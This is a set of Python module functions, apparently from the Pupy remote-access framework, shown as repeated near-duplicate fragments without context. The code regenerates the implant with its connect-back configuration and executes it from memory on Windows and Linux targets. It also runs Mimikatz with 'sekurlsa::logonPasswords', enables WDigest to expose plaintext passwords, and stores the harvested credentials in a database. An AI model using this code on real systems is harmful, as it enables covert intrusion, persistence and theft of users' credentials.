def run(self, args): self.success("looking for configured connect back address ...") payload, tpl, _ = pupygen.generate_binary_from_template( self.client.get_conf(), self.client.desc['platform'], arch=self.client.arch) self.success( "Generating the payload with the current config from {} - size={}". format(tpl, len(payload))) self.success("Executing the payload from memory ...") if self.client.is_windows(): exec_pe(self, "", raw_pe=payload, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process) elif self.client.is_linux(): mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False) self.success("pupy payload executed from memory")
def run(self, args): proc_arch = self.client.desc["proc_arch"] mimikatz_path = None if "64" in proc_arch: mimikatz_path = self.client.pupsrv.config.get( "mimikatz", "exe_x64") else: mimikatz_path = self.client.pupsrv.config.get( "mimikatz", "exe_Win32") if not os.path.isfile(mimikatz_path): self.error( "Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf" % mimikatz_path) return mimikatz_args = args.args interactive = False timeout = None if not mimikatz_args: interactive = True timeout = 10 else: mimikatz_args.append('exit') exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=interactive, fork=False, timeout=timeout)
def run(self, args): exec_pe(self, args.args, path=args.path, interactive=args.interactive, fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate, suspended_process=args.suspended_process)
def run(self, args): self.success("looking for configured connect back address ...") res=self.client.conn.modules['pupy'].get_connect_back_host() host, port=res.rsplit(':',1) self.success("Generating the payload with the current config ...") if self.client.desc["proc_arch"]=="64bit": raw_pe=pupygen.get_edit_pupyx64_exe(self.client.get_conf()) else: raw_pe=pupygen.get_edit_pupyx86_exe(self.client.get_conf()) self.success("Executing the payload from memory ...") exec_pe(self, "", raw_pe=raw_pe, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process) self.success("pupy payload executed from memory")
def run(self, args): #usefull for bind connection launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address'] newClientConf = self.client.get_conf() listeningAddressPort =None #For Bind mode if self.client.is_windows() and launcherType == "bind": listeningPort = -1 self.info('The current pupy launcher is using a BIND connection on the Windows target.') self.info('It is listening on {0} on the target'.format(addressPort)) self.info('For the duplication, you have to choose another port and it will ' 'listen on this new specific port on the target') self.info("Be careful, you have to choose a port which is not used on the target!") self.info("Be careful to firewall configuration/rules on the target too...") while listeningPort==-1: try: listeningPort = int(input("[?] Give me the listening port to use on the target: ")) except Exception as e: self.warning("You have to give me a valid port. Try again. ({})".format(e)) listeningAddress = addressPort.split(':')[0] listeningAddressPort = "{0}:{1}".format(listeningAddress, listeningPort) self.info("The new pupy instance will listen on {0} on the target".format(listeningAddressPort)) newClientConf = self.client.get_conf() #Modify the listening port on the conf. If it is not modified, #the payload will listen on the same port as the inital pupy launcher on the target newClientConf['launcher_args'][newClientConf['launcher_args'].index("--port")+1] = str(listeningPort) #Delete --oneliner-host argument, not compatible with exe payload for pos, val in enumerate(newClientConf['launcher_args']): if "--oneliner-host" in val: newClientConf['launcher_args'][pos]="" newClientConf['launcher_args'][pos+1]="" self.success("Generating the payload...") payload, tpl, _ = pupygen.generate_binary_from_template( self.log, newClientConf, self.client.desc['platform'], arch=self.client.arch ) self.success("Payload generated with the current config from {} - size={}".format(tpl, len(payload))) self.success("Executing the payload from memory ...") if self.client.is_windows(): exec_pe( self, "", raw_pe=payload, interactive=False, use_impersonation=args.impersonate, suspended_process=args.process, wait=False ) elif self.client.is_linux(): mexec(self, payload, [], argv0='/bin/bash', raw=True) self.success("pupy payload executed from memory") if self.client.is_windows() and launcherType == "bind": self.success( 'You have to connect to the target manually on {0}: ' 'try "connect --host {0}" in pupy shell'.format(listeningAddressPort))
def run(self, args): self.success("looking for configured connect back address ...") payload, tpl, _ = pupygen.generate_binary_from_template( self.client.get_conf(), self.client.desc['platform'], arch=self.client.arch ) self.success("Generating the payload with the current config from {} - size={}".format(tpl, len(payload))) self.success("Executing the payload from memory ...") if self.client.is_windows(): exec_pe( self, "", raw_pe=payload, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process ) elif self.client.is_linux(): mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False) self.success("pupy payload executed from memory")
def run(self, args): proc_arch=self.client.desc["proc_arch"] mimikatz_path=None if "64" in proc_arch: mimikatz_path=self.client.pupsrv.config.get("mimikatz","exe_x64") else: mimikatz_path=self.client.pupsrv.config.get("mimikatz","exe_Win32") if not os.path.isfile(mimikatz_path): self.error("Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"%mimikatz_path) return mimikatz_args=args.args interactive=False timeout=None if not mimikatz_args: interactive=True timeout=10 exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=interactive, fork=False, timeout=timeout)
def run(self, args): # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz. if args.wdigest: ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest) if ok: self.success(message) else: self.warning(str(message)) return proc_arch = self.client.desc["proc_arch"] mimikatz_path = None output = '' if "64" in proc_arch: mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_x64") else: mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_Win32") if not os.path.isfile(mimikatz_path): self.error("Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"%mimikatz_path) else: mimikatz_args = args.args interactive = False if not mimikatz_args: interactive = True else: mimikatz_args.append('exit') if args.logonPasswords: mimikatz_args = ['privilege::debug', 'sekurlsa::logonPasswords', 'exit'] interactive = True output = exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=interactive) try: from pykeyboard import PyKeyboard k = PyKeyboard() k.press_key(k.enter_key) k.release_key(k.enter_key) except: pass # store credentials into the database if output: try: creds = self.parse_mimikatz(output) db = Credentials(client=self.client.short_name(), config=self.config) db.add(creds) self.success("Credentials stored on the database") except: self.error('No credentials stored in the database')
def run(self, args): log = exec_pe(self, args.args, path=args.path, interactive=args.interactive, fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate, suspended_process=args.suspended_process) if args.log: with open(args.log, 'wb') as output: output.write(log)
def run(self, args): proc_arch = self.client.desc["proc_arch"] mimikatz_path = None if '64' in self.client.desc['os_arch'] and "32" in proc_arch: self.error("You are in a x86 process right now. You have to be in a x64 process for running Mimikatz.") self.error("Otherwise, the following Mimikatz error will occur after 'sekurlsa::logonPasswords':") self.error("'ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process'") self.error("Mimikatz has not been executed on the target") return if "64" in proc_arch: mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_x64") else: mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_Win32") if not os.path.isfile(mimikatz_path): self.error("Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"%mimikatz_path) return mimikatz_args = args.args exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=True)
def run(self, args): if self.client.is_windows(): log = exec_pe( self, args.args, path=args.path, interactive=args.interactive, use_impersonation=args.impersonate, suspended_process=args.suspended_process ) elif self.client.is_linux(): log = mexec( self, args.path, args.args, argv0=args.argv0 or path.basename(args.path), interactive=args.interactive )
def run(self, args): if self.client.is_windows(): log = exec_pe( self, args.args, path=args.path, interactive=args.interactive, fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate, suspended_process=args.suspended_process ) elif self.client.is_linux(): log = mexec( self, args.path, args.args, argv0=args.argv0 or path.basename(args.path), interactive=args.interactive ) if log and args.log: with open(args.log, 'wb') as output: output.write(log)
def run(self, args): proc_arch = self.client.desc["proc_arch"] mimikatz_path = None output = '' if '64' in self.client.desc['os_arch'] and "32" in proc_arch: self.error( "You are in a x86 process right now. You have to be in a x64 process for running Mimikatz." ) self.error( "Otherwise, the following Mimikatz error will occur after 'sekurlsa::logonPasswords':" ) self.error( "'ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process'" ) self.error("Mimikatz has not been executed on the target") return # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz. if args.wdigest: ok, message = self.client.conn.modules[ "pupwinutils.wdigest"].wdigest(args.wdigest) if ok: self.success(message) else: self.warning(str(message)) return if "64" in proc_arch: mimikatz_path = self.client.pupsrv.config.get( "mimikatz", "exe_x64") else: mimikatz_path = self.client.pupsrv.config.get( "mimikatz", "exe_Win32") if not os.path.isfile(mimikatz_path): self.error( "Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf" % mimikatz_path) return mimikatz_args = args.args if not mimikatz_args: mimikatz_args = ['privilege::debug', 'sekurlsa::logonPasswords'] mimikatz_args.append('exit') if args.verbose: self.log('Execute: ' + repr(mimikatz_args)) output = exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=False) if not output: self.warning('No output') return if args.verbose: self.log(output) creds = self.parse_mimikatz(output) if not creds: self.warning('No credentials found') return try: # store credentials into the database db = Credentials(client=self.client, config=self.config) db.add(creds) self.log(Table(creds, ['domain', 'login', 'hash', 'password'])) self.success("Credentials stored on the database") except: self.error('No credentials stored in the database')